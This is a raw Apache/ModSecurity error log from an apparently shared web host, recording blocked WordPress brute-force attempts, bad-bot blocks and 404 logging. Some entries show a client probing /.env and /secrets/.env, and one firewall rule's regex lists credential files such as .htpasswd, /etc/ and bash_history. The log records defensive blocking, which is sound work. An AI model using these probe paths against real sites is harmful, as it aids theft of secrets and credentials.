[Tue May 26 17:10:46.760236 2026] [security2:error] [pid 860158:tid 860170] [remote 206.189.187.127:60262] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 127.187.189.206.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWGvoYFlz_JJsUnscKptgAArQs"]
[Tue May 26 17:10:47.322418 2026] [security2:error] [pid 860158:tid 860379] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWGvoYFlz_JJsUnscKpwQAAAOA"]
[Tue May 26 17:10:49.439661 2026] [security2:error] [pid 860158:tid 860412] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWGwYYFlz_JJsUnscKp8AAAAQE"]
[Tue May 26 17:10:51.620988 2026] [security2:error] [pid 860158:tid 860377] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWGw4YFlz_JJsUnscKqJgAAAN4"]
[Tue May 26 17:10:52.155498 2026] [security2:error] [pid 860158:tid 860270] [remote 74.7.241.58:50678] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahWGxIYFlz_JJsUnscKqWAAAlm8"], referer: https://www.billing.mosykay.com/?path=/home1/taote1zo/public_html/shop/wp-includes
[Tue May 26 17:10:53.199786 2026] [security2:error] [pid 860158:tid 860339] [client 185.184.52.152:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWGxIYFlz_JJsUnscKqZQAAALg"]
[Tue May 26 17:10:53.428096 2026] [security2:error] [pid 860158:tid 860378] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWGxIYFlz_JJsUnscKqawAAAN8"]
[Tue May 26 17:10:55.105937 2026] [security2:error] [pid 860158:tid 860301] [client 203.194.101.7:60684] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWGxoYFlz_JJsUnscKqlwAAAJI"]
[Tue May 26 17:10:55.106096 2026] [security2:error] [pid 860158:tid 860301] [client 203.194.101.7:60684] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWGxoYFlz_JJsUnscKqlwAAAJI"]
[Tue May 26 17:10:56.118564 2026] [security2:error] [pid 860158:tid 860409] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWGx4YFlz_JJsUnscKqqAAAAP4"]
[Tue May 26 17:10:56.629892 2026] [security2:error] [pid 860158:tid 860366] [client 178.20.45.182:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWGyIYFlz_JJsUnscKqyAAAANM"], referer: http://anujtradingco.com/pages/coming-soon/
[Tue May 26 17:10:58.064298 2026] [security2:error] [pid 860158:tid 860412] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWGyYYFlz_JJsUnscKq6gAAAQE"]
[Tue May 26 17:11:00.195152 2026] [security2:error] [pid 860158:tid 860331] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWGy4YFlz_JJsUnscKrFgAAALA"]
[Tue May 26 17:11:01.918140 2026] [security2:error] [pid 860158:tid 860405] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWGzYYFlz_JJsUnscKrRAAAAPo"]
[Tue May 26 17:11:03.892608 2026] [security2:error] [pid 860158:tid 860365] [client 85.208.96.193:59168] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/category/upcoming-events/page/3/"] [unique_id "ahWGz4YFlz_JJsUnscKrfwAAANI"]
[Tue May 26 17:11:03.892747 2026] [security2:error] [pid 860158:tid 860365] [client 85.208.96.193:59168] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/category/upcoming-events/page/3/"] [unique_id "ahWGz4YFlz_JJsUnscKrfwAAANI"]
[Tue May 26 17:11:04.531672 2026] [security2:error] [pid 860158:tid 860388] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWG0IYFlz_JJsUnscKrggAAAOk"]
[Tue May 26 17:11:05.440274 2026] [security2:error] [pid 860158:tid 860341] [client 203.194.101.7:61024] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWG0YYFlz_JJsUnscKrpgAAALo"]
[Tue May 26 17:11:05.440405 2026] [security2:error] [pid 860158:tid 860341] [client 203.194.101.7:61024] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWG0YYFlz_JJsUnscKrpgAAALo"]
[Tue May 26 17:11:05.866708 2026] [security2:error] [pid 860158:tid 860375] [client 114.119.128.77:33867] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.toronto121mortgage.com"] [uri "/public/fimages/banner_1.jpg"] [unique_id "ahWG0YYFlz_JJsUnscKrrwAAANw"], referer: http://www.toronto121mortgage.com/public/fimages/banner_1.jpg
[Tue May 26 17:11:06.705818 2026] [security2:error] [pid 860158:tid 860298] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWG0oYFlz_JJsUnscKrtQAAAI8"]
[Tue May 26 17:11:07.832978 2026] [security2:error] [pid 860158:tid 860369] [client 103.174.5.177:59084] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "obinnawrites.com"] [uri "/xmlrpc.php"] [unique_id "ahWG04YFlz_JJsUnscKrxwAAANY"]
[Tue May 26 17:11:08.823929 2026] [security2:error] [pid 860158:tid 860306] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWG1IYFlz_JJsUnscKr8wAAAJc"]
[Tue May 26 17:11:11.212398 2026] [security2:error] [pid 860158:tid 860415] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWG1oYFlz_JJsUnscKsNwAAAQQ"]
[Tue May 26 17:11:12.798933 2026] [security2:error] [pid 860158:tid 860308] [client 103.161.104.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahWG1YYFlz_JJsUnscKsGQAAmX0"]
[Tue May 26 17:11:13.011877 2026] [security2:error] [pid 860158:tid 860298] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWG2IYFlz_JJsUnscKscgAAAI8"]
[Tue May 26 17:11:14.808345 2026] [security2:error] [pid 860158:tid 860411] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWG2oYFlz_JJsUnscKssgAAAQA"]
[Tue May 26 17:11:15.513064 2026] [security2:error] [pid 860158:tid 860339] [client 2.57.122.173:54636] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.preetishah.moes-art.com"] [uri "/.env"] [unique_id "ahWG24YFlz_JJsUnscKszgAAALg"]
[Tue May 26 17:11:15.517005 2026] [security2:error] [pid 860158:tid 860313] [client 2.57.122.173:54646] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.preetishah.moes-art.com"] [uri "/secrets/.env"] [unique_id "ahWG24YFlz_JJsUnscKszwAAAJ4"]
[Tue May 26 17:11:15.517162 2026] [security2:error] [pid 860158:tid 860313] [client 2.57.122.173:54646] ModSecurity: Warning. Matched phrase "SuperBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.preetishah.moes-art.com"] [uri "/secrets/.env"] [unique_id "ahWG24YFlz_JJsUnscKszwAAAJ4"]
[Tue May 26 17:11:15.803188 2026] [security2:error] [pid 860158:tid 860353] [client 37.59.204.128:43752] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "www.greattusker.com"] [uri "/robots.txt"] [unique_id "ahWG24YFlz_JJsUnscKs4QAAAMY"]
[Tue May 26 17:11:15.803337 2026] [security2:error] [pid 860158:tid 860353] [client 37.59.204.128:43752] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.greattusker.com"] [uri "/robots.txt"] [unique_id "ahWG24YFlz_JJsUnscKs4QAAAMY"]
[Tue May 26 17:11:15.832906 2026] [security2:error] [pid 860158:tid 860387] [client 203.194.101.7:61372] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWG24YFlz_JJsUnscKs5QAAAOg"]
[Tue May 26 17:11:15.833053 2026] [security2:error] [pid 860158:tid 860387] [client 203.194.101.7:61372] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWG24YFlz_JJsUnscKs5QAAAOg"]
[Tue May 26 17:11:15.889649 2026] [security2:error] [pid 860158:tid 860321] [client 2.57.122.173:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.preetishah.moes-art.com"] [uri "/index.php"] [unique_id "ahWG24YFlz_JJsUnscKs0wAAAKY"]
[Tue May 26 17:11:15.927970 2026] [security2:error] [pid 860158:tid 860346] [client 2.57.122.173:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.preetishah.moes-art.com"] [uri "/index.php"] [unique_id "ahWG24YFlz_JJsUnscKs2QAAAL8"]
[Tue May 26 17:11:16.076774 2026] [security2:error] [pid 860158:tid 860379] [client 2.57.122.173:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.preetishah.moes-art.com"] [uri "/index.php"] [unique_id "ahWG24YFlz_JJsUnscKs4AAAAOA"]
[Tue May 26 17:11:16.709828 2026] [security2:error] [pid 860158:tid 860263] [remote 5.78.119.122:39858] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 122.119.78.5.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWG3IYFlz_JJsUnscKs9QAA7mg"]
[Tue May 26 17:11:17.209957 2026] [security2:error] [pid 860158:tid 860238] [remote 95.216.117.13:43504] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.117.216.95.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahWG3YYFlz_JJsUnscKtAgAAj08"]
[Tue May 26 17:11:17.523139 2026] [security2:error] [pid 860158:tid 860354] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWG3YYFlz_JJsUnscKtBgAAAMc"]
[Tue May 26 17:11:17.878548 2026] [security2:error] [pid 860158:tid 860414] [client 2.57.122.173:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.preetishah.moes-art.com"] [uri "/index.php"] [unique_id "ahWG3YYFlz_JJsUnscKtFQAAAQM"]
[Tue May 26 17:11:18.362290 2026] [security2:error] [pid 860158:tid 860352] [client 54.39.136.32:51212] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "www.greattusker.com"] [uri "/"] [unique_id "ahWG3oYFlz_JJsUnscKtJwAAAMU"]
[Tue May 26 17:11:18.362455 2026] [security2:error] [pid 860158:tid 860352] [client 54.39.136.32:51212] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.greattusker.com"] [uri "/"] [unique_id "ahWG3oYFlz_JJsUnscKtJwAAAMU"]
[Tue May 26 17:11:18.984926 2026] [security2:error] [pid 860158:tid 860308] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWG3oYFlz_JJsUnscKtNgAAAJk"]
[Tue May 26 17:11:20.078416 2026] [security2:error] [pid 860158:tid 860290] [client 113.162.185.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWG34YFlz_JJsUnscKtVQAAAIc"]
[Tue May 26 17:11:20.775247 2026] [security2:error] [pid 860158:tid 860231] [remote 211.23.68.235:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.68.23.211.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/wp-login.php"] [unique_id "ahWG4IYFlz_JJsUnscKtcwAAkkg"]
[Tue May 26 17:11:21.807067 2026] [security2:error] [pid 860158:tid 860365] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWG4YYFlz_JJsUnscKtiAAAANI"]
[Tue May 26 17:11:23.868502 2026] [security2:error] [pid 860158:tid 860384] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWG44YFlz_JJsUnscKtuQAAAOU"]
[Tue May 26 17:11:23.951944 2026] [security2:error] [pid 860158:tid 860273] [remote 172.104.164.56:34514] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 56.164.104.172.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWG44YFlz_JJsUnscKtxgAA8HI"]
[Tue May 26 17:11:25.578852 2026] [security2:error] [pid 860158:tid 860316] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWG5YYFlz_JJsUnscKt5AAAAKE"]
[Tue May 26 17:11:26.114294 2026] [proxy:error] [pid 860158:tid 860395] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 17:11:26.114364 2026] [proxy_http:error] [pid 860158:tid 860395] [client 208.84.100.188:1186] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 17:11:26.115016 2026] [proxy:error] [pid 860158:tid 860395] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 17:11:26.115055 2026] [proxy_http:error] [pid 860158:tid 860395] [client 208.84.100.188:1186] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 17:11:26.125172 2026] [security2:error] [pid 860158:tid 860380] [client 167.160.64.245:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWG5oYFlz_JJsUnscKt_AAAAOE"], referer: https://www.anujtradingco.com/
[Tue May 26 17:11:26.331722 2026] [security2:error] [pid 860158:tid 860324] [client 203.194.101.7:61723] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWG5oYFlz_JJsUnscKuBAAAAKk"]
[Tue May 26 17:11:26.331914 2026] [security2:error] [pid 860158:tid 860324] [client 203.194.101.7:61723] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWG5oYFlz_JJsUnscKuBAAAAKk"]
[Tue May 26 17:11:27.319698 2026] [security2:error] [pid 860158:tid 860389] [client 167.160.64.245:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWG54YFlz_JJsUnscKuIAAAAOo"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1227515&moderation-hash=e82de4888b341ba026f4c3be1e885563
[Tue May 26 17:11:27.474446 2026] [security2:error] [pid 860158:tid 860409] [client 104.28.163.39:46929] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahWG54YFlz_JJsUnscKuIQAA_ks"]
[Tue May 26 17:11:27.956145 2026] [security2:error] [pid 860158:tid 860323] [client 195.178.110.204:51708] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "500"] [hostname "162.215.241.212"] [uri "/index.php"] [unique_id "ahWG5oYFlz_JJsUnscKuDQAAAKg"]
[Tue May 26 17:11:28.091561 2026] [security2:error] [pid 860158:tid 860368] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWG54YFlz_JJsUnscKuLgAAANU"]
[Tue May 26 17:11:28.263895 2026] [security2:error] [pid 860158:tid 860303] [client 91.117.177.142:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWG6IYFlz_JJsUnscKuNwAAAJQ"], referer: https://www.anujtradingco.com/
[Tue May 26 17:11:28.465355 2026] [security2:error] [pid 860158:tid 860342] [client 104.28.163.39:46929] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahWG6IYFlz_JJsUnscKuPAAAu3Y"]
[Tue May 26 17:11:29.327388 2026] [security2:error] [pid 860158:tid 860407] [client 91.117.177.142:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWG6YYFlz_JJsUnscKuVwAAAPw"], referer: https://www.anujtradingco.com/blog-2/blog-boxed-bigtext/?unapproved=1186526&moderation-hash=dd6fb4b9da4a13d304b4106fad919de7
[Tue May 26 17:11:30.156971 2026] [security2:error] [pid 860158:tid 860256] [remote 103.91.67.202:44274] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 202.67.91.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahWG6YYFlz_JJsUnscKuZwAA2mE"]
[Tue May 26 17:11:30.430541 2026] [security2:error] [pid 860158:tid 860381] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWG6YYFlz_JJsUnscKuagAAAOI"]
[Tue May 26 17:11:30.503375 2026] [proxy:error] [pid 860158:tid 860410] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
